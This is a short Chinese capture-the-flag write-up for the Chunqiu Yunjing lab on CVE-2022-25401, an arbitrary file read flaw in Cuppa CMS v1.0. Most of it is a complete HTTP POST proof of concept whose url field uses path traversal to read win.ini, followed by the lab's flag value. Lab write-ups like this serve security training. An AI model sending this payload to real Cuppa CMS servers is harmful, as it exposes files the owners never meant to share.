春秋云镜 CVE-2022-25401 Cuppa CMS v1.0 任意文件读取
靶标介绍
Cuppa CMS v1.0 /templates/default/html/windows/right.php文件存在任意文件读取漏洞
启动场景
漏洞利用
漏洞存在位置于/templates/default/html/windows/right.php。
Poc
POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini
http://eci-2zeeoly4mjljlefq0f3w.cloudeci1.ichunqiu.com/templates/default/html/windows/right.php
POST请求后,为空白页面,查看源代码获取flag。
得到flag
flag{9f595de1-e6dc-43c5-bc97-514e2d8436c4}